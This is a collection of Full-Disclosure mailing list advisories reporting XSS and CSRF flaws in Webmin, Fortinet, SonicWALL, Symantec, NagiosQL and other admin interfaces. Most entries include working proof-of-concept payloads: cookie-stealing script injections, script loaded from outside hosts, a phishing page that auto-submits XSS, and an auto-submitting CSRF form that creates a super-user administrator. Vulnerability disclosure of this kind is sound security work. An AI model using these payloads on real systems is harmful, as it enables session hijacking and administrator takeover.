[Full-disclosure] Reflected XSS Attacks XSS vulnerabilities in Webmin 1.670 (CVE-2014-0339)
I. VULNERABILITY - Reflected XSS Attacks XSS vulnerabilities in Webmin 1.670 II. BACKGROUND - Webmin is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS, file sharing and much more. Webmin removes the need to manually edit Unix configuration files like /etc/passwd, and lets you manage a system from the console or remotely. See the standard modules page for a list of all the functions built into Webmin, or check out the screenshots. III. DESCRIPTION - Has been detected a Reflected XSS vulnerability in Webmin 1.670 in page of log, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. The code injection is done through the parameter search in page https://IP:1/webminlog/view.cgi?id=1search= IV. PROOF OF CONCEPT - https://192.168.49.132:1/webminlog/view.cgi?id=1search=e;scriptalert(document.cookie);/script V. BUSINESS IMPACT - An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc. VI. SYSTEMS AFFECTED - Webmin version 1.670 install in Debian VII. SOLUTION - All data received by the application and can be modified by the user, before making any kind of transaction with them must be validated. VIII. References - http://www.kb.cert.org/vuls/id/381692 http://www.webmin.com/changes.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] WatchGuard Fireware XTM devices contain a cross-site scripting vulnerability (CVE-2014-0338)
I. VULNERABILITY - Reflected XSS Attacks vulnerabilities in WatchGuard XTM 11.8 II. BACKGROUND - WatchGuard builds affordable, all-in-one network and content security solutions to provide defense in depth for corporate content, networks and the businesses they power. III. DESCRIPTION - Has been detected a Reflected XSS vulnerability in XTM WatchGuard. The code injection is done through the parameter poll_name in the page /firewall/policy?pol_name=(HERE XSS) IV. PROOF OF CONCEPT - The application does not validate the parameter poll_name correctly. https://10.200.210.100:8080/firewall/policy?pol_name=qqq;body onload=alert(document.cookie)service=Anyis_new=1 V. BUSINESS IMPACT - An attacker can execute arbitrary HTML or script code in a targeted user's browser, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser allowing Cookie Theft/Session Hijacking, thus enabling full access the box. VI. SYSTEMS AFFECTED - Tested WatchGuard XTM Version: 11.8 (Build 432340) VII. SOLUTION - All data received by the application and can be modified by the user, before making any kind of transaction with them must be validated VIII. References - http://www.kb.cert.org/vuls/id/807134 http://watchguardsecuritycenter.com/2014/03/13/fireware-xtm-11-8-3-update-corrects-xss-flaw/ By William Costa william.co...@gmail.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiplus XSS in Proxmox Mail Gateway 3.1 (CVE-2014-2325)
I. VULNERABILITY - Multiplus XSS in Proxmox Mail Gateway 3.1 II. BACKGROUND - Proxmox Mail Gateway helps you protect your business against all email threats like spam, viruses, phishing and trojans at the moment they emerge. The flexible architecture combined with the userfriendly, III. DESCRIPTION - Has been detected a XSS Reflected via GET and Store XSS via POST vulnerability in Promox Mail Gateway in /objects/who/index.htm?state= parameter state and input User (E-mail address) in /quarantine/spam/manage.htm that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser and/or Session Hijacking attack IV. PROOF OF CONCEPT - The application does not validate the parameter filter in https://IP/objects/who/index.htm?itemid=1gid=2state= 'ascriptalert(document.cookie)/script V. BUSINESS IMPACT - That allows the execution attackers tohijack the authentication of administrators. VI. REQUIREMENTS --- An Attacker needs to know the IP of the device. An Administrator needs an authenticated connection to the device. VII. SYSTEMS AFFECTED - Try Proxmox Mail Gateway 3.1 VIII. SOLUTION - All parameter must be validated. Fix http://proxmox.com/news/archive/view/listid-1-proxmox-newsletter/mailid-48-proxmox-newsletter-march-2014-proxmox-ve-3-2-released/tmpl-component By William Costa ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS in url for access of Confirmation Required in box for antispam from company AKER (CVE-2013-6037)
XSS in url for access of Confirmation Required in box for antispam from company AKER (CVE-2013-6037) I. VULNERABILITY - Reflected XSS vulnerabilities in AKER SECURE MAIL GATEWAY = v2.5.2 II. BACKGROUND - The Aker Secure Mail Gateway is a complete platform security e-mail III. DESCRIPTION - Has been detected a reflected XSS vulnerability in Aker Secure Mail Gateway =2.5.2 , that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. The code injection is done through the parameter msg_id and content in the page index.php. IV. PROOF OF CONCEPT - The application does not validate the double encoding of the msg_id parameter correctly. Malicious Request (msg_id) http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f09/scriptalert(String(/XSS/).substr(1,6) ); /script Vulnerable: http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f09/script src=http://10.0.1.142:5005/xook.js/script Vulnerable: http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f09/iframe src=http://www.google.com /iframe V. BUSINESS IMPACT - An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc. VI. SYSTEMS AFFECTED - Aker Secure Mail Gateway = v2.5.2 VII. SOLUTION - http://download.aker.com.br/prod/current/atualizacoes/aker-secure-mail-gateway-2.5/patch-2/akersecuremailgateway-2.5-pt-box-patch-002-hotfix-023-0002.akp References http://www.kb.cert.org/vuls/id/687278 http://www.aker.com.br/ http://www.aker.com.br/produtos/aker-secure-mail-gateway http://www.aker.com.br/atualizacoes-asmg?field_tipo_value=All By Wiliam Costa ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Reflected XSS Attacks vulnerabilities in DELL SonicWALL Universal Management Suite v7.1 (CVE-2014-0332)
I. VULNERABILITY - Reflected XSS Attacks vulnerabilities in DELL SonicWALL Universal Management Suite v7.1 II. BACKGROUND - Dell(R) SonicWALL(R) provides intelligent network security and data protection solutions that enable customers and partners to dynamically secure, control, and scale their global networks. III. DESCRIPTION - Has been detected a Reflected XSS vulnerability in DELL SonicWALL Universal Management Suite. The code injection is done through the parameter node_id in the page /sgms/mainPage?page=genNetworkscreenid=1002manager=ScreenDisplayManagerlevel=1node_id IV. PROOF OF CONCEPT - The application does not validate the parameter node_id correctly. https://ip_gms/sgms/mainPage?page=genNetworkscreenid=1002manager=ScreenDisplayManagerlevel=1node_id=a;scriptalert(document.cookie);/scriptscreenid=1002unused=help_url=node_name=Instance ViewunitType=1searchBySonicwall=0 V. BUSINESS IMPACT - An attacker can execute arbitrary HTML or script code in a targeted user's browser, , that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser allowing Cookie Theft/Session Hijacking, thus enabling full access the box. VI. SYSTEMS AFFECTED - Tested DELL SonicWALL Universal Management Suite v7.1 DEMO ONLINE VII. SOLUTION - All data received by the application and can be modified by the user, before making any kind of transaction with them must be validated VII. REFERENCES - http://www.kb.cert.org/vuls/id/727318 http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_XSS_Resolved_in_7.1_SP2_and_7.2.pdf By William Costa william.co...@gmail.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Reflected XSS Attacks vulnerabilities in Symantec WEB Gateway 5.1.1.24 (CVE-2013-5013)
I. VULNERABILITY - Reflected XSS Attacks vulnerabilities in Symantec WEB Gateway 5.1.1.24 II. BACKGROUND - Symantec Corporation is an American computer security, backup and availability solutions software corporation headquartered in Mountain View, California, United States. It is a Fortune 500 company and a member of the SP 500 stock market index III. DESCRIPTION - Has been detected a Reflected XSS vulnerability in Symantec Web Gateway. The code injection is done through the parameter operand[] in the page /spywall/blacklist.php?variable[]=operator[]=operand[]= IV. PROOF OF CONCEPT - The application does not validate the parameter operand[] correctly. https://10.200.210.144/spywall/blacklist.php?variable[]=operator[]=operand[]='scriptalert(document.cookie);/script V. BUSINESS IMPACT - An attacker can execute arbitrary HTML or script code in a targeted user's browser, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser allowing Cookie Theft/Session Hijacking, thus enabling full access the box. VI. SYSTEMS AFFECTED - Tested Symantec Web Gateway Version: 5.1.1.24 VII. SOLUTION - All data received by the application and can be modified by the user, before making any kind of transaction with them must be validated http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisorypvid=security_advisoryyear=suid=20140210_00 By William Costa william.co...@gmail.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS Reflected vulnerabilities in OS of FortiWeb v 5.0.3 (CVE-2013-7181)
I. VULNERABILITY - XSS Reflected vulnerabilities in OS of FortiWeb v 5.0.3 CVE-2013-7181 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7181 II. BACKGROUND - Fortinet's industry-leading, Network Security Platforms deliver Next Generation Firewall (NGFW) security with exceptional throughput, ultra low latency, and multi-vector threat protection. III. DESCRIPTION - Has been detected a XSS Reflected vulnerability in Fortiweb in /user/ldap_user/add parameter filter 5.0.3 , that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser and/or Session Hijacking attack IV. PROOF OF CONCEPT - The application does not validate the parameter filter in /user/ldap_user/add. V. BUSINESS IMPACT - That allows the execution attackers to hijack the authentication of administrators. VI. REQUIREMENTS --- An Attacker needs to know the IP of the device. An Administrator needs an authenticated connection to the device. VII. SYSTEMS AFFECTED - Try FortiWEB VM or appliance v5.0.3 VIII. SOLUTION - Upgrade to FortiWeb 5.1.0 or higher. By William Costa ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fortinet FortiOS 5.0.5 contains a reflected cross-site scripting (XSS) vulnerability ( CVE-2013-7182)
I. VULNERABILITY - Reflected XSS Attacks vulnerabilities in FortiOS 5.0.5 II. BACKGROUND - Fortinet's industry-leading, Network Security Platforms deliver Next Generation Firewall (NGFW) security with exceptional throughput, ultra low latency, and multi-vector threat protection. III. DESCRIPTION - Has been detected a Reflected XSS vulnerability in FortiOS in 5.0.5. The code injection is done through the parameter mkey in the page /firewall/schedule/recurrdlg IV. PROOF OF CONCEPT - The application does not validate the parameter mkey correctly. http://IP_FORTIGATE/firewall/schedule/recurrdlg?mkey=a;SCRIPT SRC=http://10.0.1.120/xss/good.js;/SCRIPT V. BUSINESS IMPACT - An attacker can execute arbitrary HTML or script code in a targeteduser's browser, , that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser allowing theft CSRF token, thus enabling the creation of a Administrator User in box for full access VI. SYSTEMS AFFECTED - Try FortiOS v5.0.5 VM and Applaince VII. SOLUTION Upgrade to FortiOS 5.0.6 or higher. References http://www.fortiguard.com/advisory/FG-IR-14-003/http://www.kb.cert.org/vuls/id/728638 By William Costa ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Contact PSIRT Fortinet
Does anyone have a contact person in the PSIRT at Fortinet ? The email PSIRT at Fortinet not have response. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Reflected XSS Attacks XSS vulnerabilities in NagiosQL 3.2.0 Servicepack 2 (CVE: CVE-2013-6039)
I. VULNERABILITY
-
Reflected XSS Attacks XSS vulnerabilities in NagiosQL 3.2.0 Servicepack 2
II. BACKGROUND
-
NagiosQL is a web based administration tool designed for Nagios, but might also
work with forks. It helps you to easily build a complex configuration with all
options, manage and use them. NagiosQL is based on a webserver with PHP, MySQL
and local file or remote access to the Nagios configuration files.
III. DESCRIPTION
-
Has been detected a Reflected XSS vulnerability in NagiosQL in all pages that
containing input for search, that allows the execution of arbitrary HTML/script
code to be executed in the context of the victim user's browser.
The code injection is done through the parameter txtSearch in all pages
IV. PROOF OF CONCEPT
-
The application does not validate the parameter “txtSearch” correctly.
Malicious Request (txtSearch)
Vulnerable:
POST /nagiosql/admin/hostdependencies.php HTTP/1.1
Host: 10.0.1.120
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:24.0) Gecko/20100101
Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip,
deflate
Referer: http://10.0.1.120/nagiosql/admin/hostdependencies.php Cookie:
PHPSESSID=hhr9lv77k9d4vvh0cauco48206
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 198
txtSearch=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script%3Emodus=checkformhidModify=hidListId=hidLimit=0hidSortBy=1
hidSortDir=ASChidSort=0selModify=noneselTargetDomain=1HTTP/1.1 200 OK
Date: Wed, 30 Oct 2013 16:15:34 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre- check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3440
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/htmlV.
BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or script code in a targeted user's
browser, this can leverage to steal sensitive information as user credentials,
personal data, etc.
VI. SYSTEMS AFFECTED
-
NagiosQL test only 3.2.0 Servicepack 2
`
VII. SOLUTION
-
All data received by the application and can be modified by the user, before
making any kind of transaction with them must be validated .
After click in search.
VIII. REMOTE EXPLOIT
-
Are two pages an that user access and another contains code for send via post
the XSS
Send phishing email For administrator for a page with follow code: Name:
page.html
html
body
H1BLAH BLAH BLAH/H1
pYour bases are not belong to me, dun worry bro/p
? if (isset($_GET[done])) {
die();
}?iframe src=http://yoursite.com/xss/index.php; width=1 height=1
frameborder=0/iframe
/body
/html
Name: index.php
html
head
style
.xss {display: none;
}
/style
/head
body onload=XSS.submit();
form id=xss action=http://sitevictim/nagiosql/admin/hosts.php;
method=post name=XSS
input name=txtSearch
value=scriptalert(document.cookie);/script/input
/form
/body
/html
BY
F3nr1r (William Costa)
william.co...@gmail.com
REFERENCES
http://cwe.mitre.org/data/definitions/79.html
http://www.nagiosql.org/
http://www.nagiosql.org/forum8/solved-issues/3270-security-hotfix-for-%20nagiosql-3-2-sp2.html#3690
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CSRF vulnerabilities in OS of fortianalyzer 5.0.4
Cert(R) no respond my email, not Fortinet has not given the credits. I. VULNERABILITY - CSRF vulnerabilities in OS of fortianalyzer 5.0.4 II. BACKGROUND - Fortinet’s industry-leading, Network Security Platforms deliver Next Generation Firewall (NGFW) security with exceptional throughput, ultra low latency, and multi-vector threat protection. III. DESCRIPTION - Has been detected a CSRF vulnerability in FortiAnalyzer in /cgi-bin/module//sysmanager/admin/SYSAdminUserDialog 5.0.4 , that allows the execution attackers to hijack the authentication of administrators for requests that modify settings or creation of user administrator in fortianalyzer, because this functions are not protected by CSRF-Tokens. IV. PROOF OF CONCEPT - The application does not validate the parameter “csrf_token” /cgi-bin/module//sysmanager/admin/SYSAdminUserDialog. html body onload=CSRF.submit(); html body onload=CSRF.submit(); form id=csrf action=https://IP_Fortianalyzer/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog; method=post name=CSRF input name=userId value=user.via.cfsr /input input name=type value=0 /input input name=rserver value= /input input name=lserver value= /input input name=subject value= /input input name=cacerts value=Fortinet_CA2 /input input name=password value=123456 /input input name=password_updated value=1 /input input name=confirm_pwd value=123456 /input input name=confirm_pwd_updated value=1 /input input name=host_1 value=0.0.0.0/0.0.0.0 /input input name=host_2 value=255.255.255.255/255.255.255.255 /input input name=host_3 value=255.255.255.255/255.255.255.255 /input input name=host_4 value=255.255.255.255/255.255.255.255 /input input name=host_5 value=255.255.255.255/255.255.255.255 /input input name=host_6 value=255.255.255.255/255.255.255.255 /input input name=host_7 value=255.255.255.255/255.255.255.255 /input input name=host_8 value=255.255.255.255/255.255.255.255 /input input name=host_9 value=255.255.255.255/255.255.255.255 /input input name=host_10 value=255.255.255.255/255.255.255.255 /input input name=host6_1 value=:::::::/128 /input input name=host6_2 value=:::::::/128 /input input name=host6_3 value=:::::::/128 /input input name=host6_4 value=:::::::/128 /input input name=host6_5 value=:::::::/128 /input input name=host6_6 value=:::::::/128 /input input name=host6_7 value=:::::::/128 /input input name=host6_8 value=:::::::/128 /input input name=host6_9 value=:::::::/128 /input input name=host6_10 value=:::::::/128 /input input name=profile value=Super_User /input input name=alladomRDGrp value=0 /input input name=_adom value= /input input name=allpackRDGrp value=0 /input input name=_adom value= /input input name=allpackRDGrp value=0 /input input name=_pack value= /input input name=desc value= /input input name=showForce value=0 /input input name=numhosts value=0 /input input name=numhosts6 value=3 /input input name=_comp_8 value=OK /input input name=actionevent value=new /input input name=profileId value= /input input name=mgt value= /input input name=dashboard value= /input input name=dashboardmodal value= /input input name=csrf_token value= /input /form /body /html V. BUSINESS IMPACT - That allows the execution attackers to hijack the authentication of administrators for requests that modify settings or creation of user administrator in fortianalyzer and have access all function of box. VI. REQUIREMENTS --- An Attacker needs to know the IP of the device. An Administrator needs an authenticated connection to the device. VII. SYSTEMS AFFECTED - Try Fortianalyzer VM or appliance v5.0.4 VIII. SOLUTION - UpGrade for v5.0.5 POC https://vimeo.com/78776768 By William Costa william.co...@gmail.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
